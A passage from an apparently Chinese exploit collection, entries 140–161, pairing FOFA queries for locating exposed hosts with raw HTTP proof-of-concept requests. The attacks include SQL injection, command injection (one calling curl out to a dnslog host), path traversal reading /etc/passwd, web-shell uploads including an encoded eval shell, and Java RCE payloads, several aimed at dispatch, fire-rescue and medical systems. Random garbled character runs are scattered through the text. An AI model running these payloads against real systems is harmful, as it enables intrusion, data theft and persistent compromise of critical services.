5 d- h0 g% o9 w+ ~% Z! TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 r' X3 `3 H: [. {) N9 mAccept-Encoding: gzip, deflate, br ^, s; Y- G9 w- t( c+ J$ G
Connection: close
; ?( O) W, S/ _4 _Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk' k$ v7 X- Q/ g2 j# p
Upgrade-Insecure-Requests: 1
: |5 H. H6 b! f, T3 ?8 S# F" |. v- M. b
: z7 b& \- S; w
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. e0 \4 M. c# C9 {! p; `7 ?
CVE-2024-25663 X: c3 X6 g O& b/ X
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( G' Q$ W8 S/ J( n, J7 d! A" d7 d3 xGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1/ u6 E$ k: J0 G
Host: x.x.x.x
# ?# t& ?) h6 D$ p3 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 L1 f% t1 t1 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; A0 M, j k2 l5 x1 R* a) K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# F0 X9 w- Q6 C' m5 UAccept-Encoding: gzip, deflate, br) V; W: `9 l( Q4 [
Connection: close& z& }2 D+ U, B$ o& l3 ]. F! e; @
Cookie: authcode=h8g9
8 f% L6 g' ?- Q. O% g; Y6 hUpgrade-Insecure-Requests: 1
C0 v! f8 T2 Z; b2 O3 }" P3 b1 I! F
9 J( e5 O+ Y E9 a% E141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
9 r/ ]6 w$ g/ u+ u8 _1 aFOFA:body="指挥调度管理平台"" T/ k7 k) W! H$ n# ]) s
POST /app/ext/ajax_users.php HTTP/1.1% N+ e4 E% i4 C" y) O0 ?! Z1 p2 i
Host: your-ip
: L( |" K; n: M7 h7 PUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info. z4 e" M2 y& ]/ I: p7 Q1 b
Content-Type: application/x-www-form-urlencoded H* y! b, g4 ~( V& N. L M, y
: h; y2 v' R7 P! \( N1 m! ]; n
$ f, @# N+ c% H. a3 ~1 @$ d
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
' p7 Y9 D8 x5 O8 @" |5 x; f7 V# v6 F4 s1 U/ b R
3 j- z1 ]" G4 L" R, [2 R142. CMSV6车辆监控平台系统中存在弱密码
5 U& W+ F+ W9 J# S, N7 B/ ~CVE-2024-29666
?: ~) g( t/ |" d5 U3 iFOFA:body="/808gps/"
8 q, o' I% f" sadmin/admin. j$ c& d7 ~* e" O( u% X* e- m
143. Netis WF2780 v2.1.40144 远程命令执行0 s5 z* F- k7 ]) X
CVE-2024-25850" f4 z j* |& r' Q6 ?+ D" c z
FOFA:title='AP setup' && header='netis'4 j; m; z5 D- x. c
PAYLOAD
! N% l Z/ Q1 a1 C4 W; ~8 o+ N
- B/ w, S6 N3 ?( z144. D-Link nas_sharing.cgi 命令注入
! q5 a/ V" B( e6 ?5 bFOFA:app="D_Link-DNS-ShareCenter"
3 C- e- {" S$ B% }% }9 nsystem参数用于传要执行的命令& b; n5 k1 X+ q1 ~( e& s
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. A6 ^1 c1 n- Q) RHost: x.x.x.x2 G5 A6 g$ Q6 Y/ F ?; b* G6 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.03 N g8 ~/ x, a# t0 `
Connection: close
; r, V9 m3 d$ |$ o1 i$ B: @( \Accept: */*
Y& e T: m7 E0 w3 NAccept-Language: en* w H' }5 N- E
Accept-Encoding: gzip8 s4 Z" z1 m/ K: P4 q
) O" F/ J3 K! O* n* X" R: k0 y% k8 H$ `# T/ V' g7 _
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 c7 w4 [+ ]5 OCVE-2024-34007 b% X- k: i/ k" ~% H* H6 r
FOFA:icon_hash="-631559155"' _7 r9 e& J9 w- R
GET /global-protect/login.esp HTTP/1.1. Z9 I4 b8 d' a: _3 a% A
Host: 192.168.30.112:1005/ p( x* G, Q9 v, F1 Y' i `' }) F, _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 T! U) E+ M& vConnection: close( H. @7 [+ ]3 r& M. k
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;3 F- s, A% A4 C: I6 e
Accept-Encoding: gzip0 ^- w3 r, Q7 K: Q. [0 I
# X+ W7 Z- I- T) L4 E, Y3 O" j
% g2 \- e* e) S2 Q( h
146. MajorDoMo thumb.php 未授权远程代码执行
+ y0 t. d3 z- d1 S) x1 PCNVD-2024-021753 t S9 Y, X" D. Z$ i0 M4 Z6 B+ K
FOFA:app="MajordomoSL"
/ d0 m' `+ b) {GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
5 D& l2 ]6 O" i" {$ i% U( N, @Host: x.x.x.x
1 `- [9 x- G# i3 F" V/ \9 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
, f2 N4 l, S# r" jAccept-Charset: utf-8
6 M+ d, V9 G8 a+ `! c2 E6 c: {Accept-Encoding: gzip, deflate
" \, b+ I6 m. z) |Connection: close! }) ^- n/ o$ o2 c' m; K
4 r$ T( B+ v/ L& j7 X
! S$ x' g2 f( C" J9 i
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历3 Y% Q& M- ]4 T* g
CVE-2024-32399, X4 s# W/ ~% Z3 [+ h1 Y" y
FOFA:body="RaidenMAILD"
: E1 U! r( W% d( J; V. lGET /webeditor/../../../windows/win.ini HTTP/1.1
6 i4 Q6 F) ?; r* m: a, l- x% {Host: 127.0.0.1:81/ V! E8 g; n9 d/ L1 w' g4 j/ q
Cache-Control: max-age=09 I# I, [0 X1 T
Connection: close" O4 x) Y) D& Z: g/ \3 P% d
2 }# n5 e/ t9 i3 x! O
. m: [, p( Y" K! G! {4 @148. CrushFTP 认证绕过模板注入' t0 o" N; t$ Z0 s, e
CVE-2024-40405 I- S& N3 g# [! N4 W
FOFA:body="CrushFTP"
( |0 T+ p! Q2 A VPAYLOAD
: j: f0 h0 m5 H# `- `8 [
( i, e( }3 p l4 k1 Y' ~% T149. AJ-Report开源数据大屏存在远程命令执行
4 H' ^' o8 E2 [0 j! WFOFA:title="AJ-Report"
( {: z* U: i: x* q% v6 b L" y' @& {( ?- {2 v# S7 b
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1) C1 J# V+ n# Y) h' C4 I1 s: G& m
Host: x.x.x.x5 P& ?* Z/ L3 Z* f* t. C1 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% l4 L+ N8 z" O- D! r/ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 \3 |6 k* S, h
Accept-Encoding: gzip, deflate, br8 J- J9 u! ]% M9 ?
Accept-Language: zh-CN,zh;q=0.9/ U( Z1 S% V. O' Z7 Z# r3 w
Content-Type: application/json;charset=UTF-8( b9 a0 F. m$ A+ X7 L' q/ {
Connection: close. b- T$ ^1 L6 o' g) r
% f: j. [, {" c
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
0 [) K _- V; k" R0 k3 k5 \( i$ B; r7 o% v
150. AJ-Report 1.4.0 认证绕过与远程代码执行$ ] }7 G: d2 o9 } Z$ j+ ~: [
FOFA:title="AJ-Report"" N) ^ I" E; d4 c3 h% D
POST /dataSetParam/verification;swagger-ui/ HTTP/1.14 u+ }9 K& v4 c* I0 X, }
Host: x.x.x.x
$ n- U+ Y; {3 k2 b) B& p( Z$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 E+ j8 N7 g: |8 {. i8 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ], {' p( \; x- Z3 C; |Accept-Encoding: gzip, deflate, br9 |% q9 P, _4 ~ C! G
Accept-Language: zh-CN,zh;q=0.9
" L0 ]6 e8 ?' P7 ]3 N0 GContent-Type: application/json;charset=UTF-84 V; ?5 ~6 t; d" h
Connection: close6 I5 e9 ?" {3 U d
Content-Length: 339) U, |( D8 y+ G1 h5 s6 d0 v
7 P! x. @3 T6 U: v* F- ^ S{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}$ r" \8 [* y* v/ `8 w
' l& O0 A8 Y7 n
4 f! P8 g5 G. O+ P& A/ v3 l6 C% C: k4 @
151. AJ-Report 1.4.1 pageList sql注入
/ B% ?+ k0 g6 e% q# IFOFA:title="AJ-Report"" s! C9 O4 Z% Q7 T3 X6 X0 v$ p
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
- o+ i+ R& ~: X5 B: S- XHost: x.x.x.x
2 P [. i! s$ X" x% e9 K1 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 ]1 k6 o" i& t+ e" x7 x( v7 c$ Q( ~Connection: close
4 V7 r2 k1 ?8 r1 D4 \% bAccept-Encoding: gzip
( W0 Z# ]$ N' R6 |
6 v$ L }: c# N; k- Z+ n b; n' l v
152. Progress Kemp LoadMaster 远程命令执行
- j4 |5 l' g! D8 W3 iCVE-2024-1212
j. s/ G% f: CLoadMaster <= 7.2.59.2 (GA)8 q* [8 T# V$ X5 N: ^
LoadMaster<=7.2.54.8 (LTSF)
) b7 y8 E9 M8 v ]5 O8 P/ GLoadMaster <= 7.2.48.10 (LTS)8 n3 q1 |+ i3 a$ Y4 G
FOFA:body="LoadMaster"9 q4 L, u0 |, Q
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码, e% x1 O$ G4 A Y$ d
GET /access/set?param=enableapi&value=1 HTTP/1.1
* i: v9 w/ j6 B; SHost: x.x.x.x
7 m7 s! q& k3 g6 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.14 R+ I7 G/ O9 p/ g/ O6 ~" r, F3 T
Connection: close; [$ F% T, P7 n1 h7 O' W8 m. T: y7 l
Accept: */*
8 p: z' F* {9 R$ v. gAccept-Language: en( H$ b$ A g0 n" l. T) W; @
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
- m8 ~' w3 L' Y: _+ w0 w5 U( SAccept-Encoding: gzip
4 R& D5 F' ^. S; E! D% T' Y6 [% }, q
+ T2 w5 Y2 m% Y f3 G$ n153. gradio任意文件读取( K0 }) x8 r1 R
CVE-2024-1561FOFA:body="__gradio_mode__"
- t) P1 l6 i8 r" g第一步,请求/config文件获取componets的id+ g$ O5 X/ w" h# K
http://x.x.x.x/config2 b8 p: b Z& t! }2 }. G2 s
$ t& F# |1 m$ n
5 U& X* C7 ]3 s+ z! \. Q& ?第二步,将/etc/passwd的内容写入到一个临时文件7 `7 }+ q1 u9 d, D% O6 e ?
POST /component_server HTTP/1.1
! w& N" m+ `. xHost: x.x.x.x
/ Y6 o! x; T+ h ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
" M; G; a$ c; W7 S0 S kConnection: close% M/ M- f* [# ?2 i+ V
Content-Length: 115
; y% t* Y. M: `" O- d$ ~Content-Type: application/json
6 N; x5 N4 [0 @: F8 Z; GAccept-Encoding: gzip, A/ r: q# A8 N* @+ S* B$ `' ^
# E( x/ U3 X: h5 s
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
P$ m( {& B+ i0 V4 P9 k
% S0 y3 r7 v9 u/ C) D1 u
; E$ b' F: R9 a第三步访问6 p; ]! j% p& A
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
% U% _( m/ w- @0 r Q) \/ k" u* W) k( a4 C
9 F. Z) C7 Q1 W" r; Z& B# N
154. 天维尔消防救援作战调度平台 SQL注入
- `$ D `) _ k' c* mCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
5 K, m- Z7 O/ Z* ]5 g% [* yPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
4 w* w- N9 a4 }8 ?+ HHost: x.x.x.x1 n- X% i2 G4 @9 Z+ X
Content-Length: 1062 B ?- v$ ~4 g- S) b7 \1 t
Cache-Control: max-age=0
o7 C0 C0 |! n* gUpgrade-Insecure-Requests: 1
- ?: l5 [: D$ K8 h, z0 B& GOrigin: http://x.x.x.x
z7 a! x- f9 W* F4 v( vContent-Type: application/json
1 m" W% |) X2 G$ E+ ]# P' ~# BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
( O3 i5 R% }( r0 u, r) N. k+ Z+ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ s+ X$ l; e: HReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
- a4 F) [- w% m- ~ U5 W, lAccept-Encoding: gzip, deflate: _2 P* \5 i) ]" Z5 J
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
; w# ~; q5 T" F" ?1 YConnection: close
1 n @; u$ {, u& \9 Z9 q3 {& Y) B' d. ~
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}: l ~9 {6 D$ v
* F9 q, Q4 F+ J; @2 R( V
# Y' h. u* u S& C% K
155. 六零导航页 file.php 任意文件上传4 L9 H+ i1 b, r- k1 G9 l, g! U9 @
CVE-2024-34982) r3 e" [8 W# n# k' s6 ` x1 w$ O
FOFA:title=="上网导航 - LyLme Spage"
+ ` k" B7 B) IPOST /include/file.php HTTP/1.14 o m1 x/ ^' \5 _" {9 i% @: ?2 v
Host: x.x.x.x
6 K+ y3 D& v" M; NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
0 \% @5 R" ~2 s# {' v: [Connection: close
! p4 _ g2 M* U3 i9 V1 oContent-Length: 2323 S- X( {; g* Q" a
Accept: application/json, text/javascript, */*; q=0.01. n. ?( q- |6 _
Accept-Encoding: gzip, deflate, br
( G: e4 P4 x" x3 ?) C1 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! ?# l0 u4 W: LContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f% f6 q8 m; Z8 N5 J& } a
X-Requested-With: XMLHttpRequest
3 D1 ^2 p8 }( @% |: z
7 k" d) \3 ~7 w4 D+ I-----------------------------qttl7vemrsold314zg0f0 b2 T8 L& {( u/ F
Content-Disposition: form-data; name="file"; filename="test.php"7 C6 |0 f( F9 H% s
Content-Type: image/png( n# q1 ]4 K/ p; w
4 O5 c; ^# O5 _) d2 y1 r8 \
<?php phpinfo();unlink(__FILE__);?>0 U0 V2 J) ]0 I I
-----------------------------qttl7vemrsold314zg0f--
: H2 r( y2 I! c. W2 `" H, T" `9 u) t- I
8 u* b* q" n m访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
8 h+ ?1 K& B/ c! _. I
4 z5 U, i1 E# P8 J156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 d$ W% d# Q4 ]( a5 ]CVE-2024-3721
. C9 H' i* B3 c& jFOFA:"Location: /login.rsp"
" E; p4 F: r9 H* K, Z" N·TBK DVR-4104+ o9 ?3 @; a1 R1 D
·TBK DVR-4216
4 T& ]: r+ }1 P acurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"3 z* ]! Z7 A$ P( G1 t7 J
- L& E6 k/ j h8 Q7 ?) @4 k
5 U5 N* {4 U% b1 X# ^" b; X/ r zPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
0 z3 u5 h5 ]0 }) i4 _9 YHost: x.x.x.x
" f: ~* E$ s( H* }% kUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" \1 W& M' k+ C2 r$ u, kConnection: close
/ q9 ~5 S3 E; D: OContent-Length: 0
' T3 ?7 i; o w, y9 j yCookie: uid=1
/ G! L$ H' b8 ~/ ~- H mAccept-Encoding: gzip
4 g& w2 P* J. {8 I) [9 H* D. b* R7 Y p$ T& F
' b" d, h c/ Y157. 美特CRM upload.jsp 任意文件上传7 I7 q; V6 I+ _/ N
CNVD-2023-069714 _$ H7 e0 R m$ I" G* T
FOFA:body="/common/scripts/basic.js"; t' R5 m& D3 r Y
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
9 J" y& K% V; h# F! NHost: x.x.x.x
- }0 L: K1 B) P7 c1 F7 C0 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ P( |8 p6 r; a6 B q
Content-Length: 7091 _$ R% U1 \! t* |5 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ ?# t* O/ Y' `8 [: h1 C
Accept-Encoding: gzip, deflate
, I3 W, ~1 I1 E$ ]& @6 V" QAccept-Language: zh-CN,zh;q=0.9/ d" q) G9 |" `. Z2 a; d; K- K$ E$ A! W
Cache-Control: max-age=0
8 }, l0 L# D) @- v4 j4 {Connection: close
V0 U4 z* S: M$ }- x4 LContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN5 p1 \' |4 } F1 m" W# R% [
Upgrade-Insecure-Requests: 10 A; @+ O2 _# O, i7 O' Q- n' J
, j$ Z: S# p& [1 r
------WebKitFormBoundary1imovELzPsfzp5dN
, C! K# C" A; l4 w. SContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 R& ~- H$ K7 m- f' ~# V% VContent-Type: application/octet-stream0 Z& j; t( y6 g7 g5 p
: O1 ]4 C9 R4 W" W' F# D
nyhelxrutzwhrsvsrafb
$ z: E3 @0 C6 {1 F2 M9 ^------WebKitFormBoundary1imovELzPsfzp5dN, J8 F$ Z: a( n7 s; Y# g
Content-Disposition: form-data; name="key"
0 K: ?) v1 R3 Z( L0 l, \# o3 m% @7 c2 }4 D: L) n. H( f# }6 a) C
null$ ?3 u' h# v7 Q# I; \! H% _
------WebKitFormBoundary1imovELzPsfzp5dN# ~5 H2 b2 ?4 O5 X- Y2 w4 v
Content-Disposition: form-data; name="form" W8 m7 G$ E# A% Q( i5 k# M+ q: y
9 {& p, d: e8 ]. vnull
r: l$ C e* \; H------WebKitFormBoundary1imovELzPsfzp5dN( W' C1 s' ~7 X t
Content-Disposition: form-data; name="field"; }2 r* F+ A; P6 z) E
" L5 o6 P: G# ]% c) L# x; _/ Enull7 Q1 h6 o8 f% k4 e
------WebKitFormBoundary1imovELzPsfzp5dN
$ m1 Y% q. \ M5 E) K! Z2 G4 }9 DContent-Disposition: form-data; name="filetitile"
2 |2 D; O S2 t$ m) `
: k- r4 j' t R/ B# O$ bnull$ R* w& G7 f& U, Q4 E
------WebKitFormBoundary1imovELzPsfzp5dN( H) [3 i) f3 s/ r
Content-Disposition: form-data; name="filefolder"0 X% |# j5 b- ^0 p2 g6 M7 U7 K0 O
, C3 a7 T6 w: D3 dnull
6 i9 a8 v4 n4 J t0 z& g4 ~ o------WebKitFormBoundary1imovELzPsfzp5dN--. n" y: X# j$ n1 f) T
$ \1 M/ W. x* b4 H2 I9 p% H: S& f
1 h: r& `; U* g4 thttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
+ T8 a: ~) I/ Y: r
J# m2 ^* L% F158. Mura-CMS-processAsyncObject存在SQL注入
, M9 F9 t4 R) k& d& u) C1 `' o+ P( ECVE-2024-326401 w; y: T4 Q- ]; [
FOFA:"Generator: Masa CMS". `) i1 _( K/ j
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
4 }, v1 X: \. y' aHost: {{Hostname}}0 J3 S& g3 l: L2 T% n/ @
Content-Type: application/x-www-form-urlencoded! _" W* @4 j/ N7 Y" @1 R; K( J: Y
5 w$ ]* w8 \: }% j2 Jobject=displayregion&contenthistid=x\'&previewid=1; F! S- f( c( J! B J
9 U+ v( [# X6 Z+ @5 l( q! e. h5 [0 N1 ~1 P* N3 x3 A1 z: E8 b' _
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
, `6 J1 K$ r( D; O# q( ~( s% D" K9 j% BFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")# |4 I. Q- I. m# J$ f) i7 {
POST /webservices/WebJobUpload.asmx HTTP/1.13 q" t% Z1 ?3 b) m Q
Host: x.x.x.x
$ L, y, n; E2 I" c5 `6 [6 `) w: C7 g& B/ A- bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
" I$ z% D! m" A. lContent-Length: 1080
* S1 k' |( f1 ^. ZAccept-Encoding: gzip, deflate: o7 C; K/ k; G; K) |
Connection: close3 e) [. F0 U) \% ~7 T6 m; L/ E
Content-Type: text/xml; charset=utf-8
1 @% j* v: C1 r) X3 hSoapaction: "http://rainier/jobUpload", ]2 t- B' \& S* N# q& _
2 Y6 G; M0 r/ ~) A2 U G, p
<?xml version="1.0" encoding="utf-8"?>, Z3 s% T+ Q* n/ z+ T& y4 ?
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 j1 P, n* W8 `
<soap:Body>
2 w0 D( ~$ e* k' p# n! F: P% t+ j<jobUpload xmlns="http://rainier">7 x6 ?6 _9 Z; B' Y: \/ y3 z
<vcode>1</vcode>! s$ C7 O: i7 n. k6 L
<subFolder></subFolder>
' [' q. R, ?- E# s<fileName>abcrce.asmx</fileName>
/ G7 ^, G, W2 W G8 v; V. `5 i<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>, ?) ^ ]# c5 J0 L1 k; W
</jobUpload>
7 N- C. b# v4 x5 E+ U. D</soap:Body>
7 U8 h, s: D0 L( H3 k</soap:Envelope>5 f9 _2 n* O" C+ s$ c9 z
8 b: t: S) s4 D" {
! {5 g, C; B7 }- \' `/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
) Y; Q% j" D( f) t+ c7 T b+ N
. {$ J1 C& S3 f z3 ]( u160. Sonatype Nexus Repository 3目录遍历与文件读取2 k" t6 P u; x5 [2 y# I1 D
CVE-2024-49568 S3 c( X! A. M) ~ J" B
FOFA:title="Nexus Repository Manager"% y) `! y" j# @; w2 A$ M3 c
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.18 j. w) z" E' P) \. Y+ P
Host: x.x.x.x
g7 r' M0 I6 ~+ D6 e4 P) [4 b" YUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0- b j$ u4 |0 t0 @3 j
Connection: close3 }* o& I2 L1 l6 Z, @
Accept: */*
5 d; D. k% s2 e. a/ ^! q( ~' R) kAccept-Language: en
5 c) t, S2 I" N& E1 g4 dAccept-Encoding: gzip# l8 P2 ?# W# n+ s6 G: _
! n; c: ]. k3 \, J: w- `! p9 r/ Y! y3 t
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传/ z; V) A- l. y4 g( m
FOFA:body="/KT_Css/qd_defaul.css"' G* f. o1 [* Q
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密. G; ^) C$ d8 h
POST /Webservice.asmx HTTP/1.1
0 R; w% b- p+ a; H" A( \5 eHost: x.x.x.x
& `0 X' u# ~; Y. hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
' V% \" P/ g ^8 i1 R, ~Connection: close3 O0 P1 ^" y8 H
Content-Length: 445
( f$ W% Q. K/ m7 O! g2 M- ?$ CContent-Type: text/xml
' X! v9 K/ [. cAccept-Encoding: gzip
- Y2 ] |+ Y' N. l$ `, j( v1 f1 v3 f1 L3 W. _* k8 k5 C
<?xml version="1.0" encoding="utf-8"?>
( C1 c+ e; f' C+ @<soap:Envelope xmlns:xsi="( d$ q+ N( K8 f9 k3 ]* v
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
4 D7 M$ j# g* k. [! ~" M8 Exmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- J3 y, I% O" k9 L# n/ U! j
<soap:Body>
; ~( O5 r( s% H! _" W% u, T2 o7 X<UploadResume xmlns="http://tempuri.org/">& F# x4 j9 s5 [0 h& E1 ^2 y
<ip>1</ip>9 R0 J' G1 S/ n9 h+ h! G0 W
<fileName>../../../../dizxdell.aspx</fileName>
" T$ a6 e1 E! s' o7 [2 ~8 k* w<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
) y+ L& ]- k& v% g8 [8 t' r* p: r# f<tag>3</tag>/ B( q2 {$ Y t+ r' E9 L% X! B
</UploadResume>
5 ~' D* W: x- @4 s</soap:Body>
5 s2 K& B0 P* s; g/ a, J* D</soap:Envelope>' i+ G6 \% Z! [% g9 h m# c& ~
% l2 [* c5 ^9 F9 W4 |+ v
3 l9 c* x* w) E9 o# W" }1 y# Uhttp://x.x.x.x/dizxdell.aspx
# @! e( o" ~7 f: h+ N! l7 j7 W! k$ z9 h% k) n- x4 L" B$ s
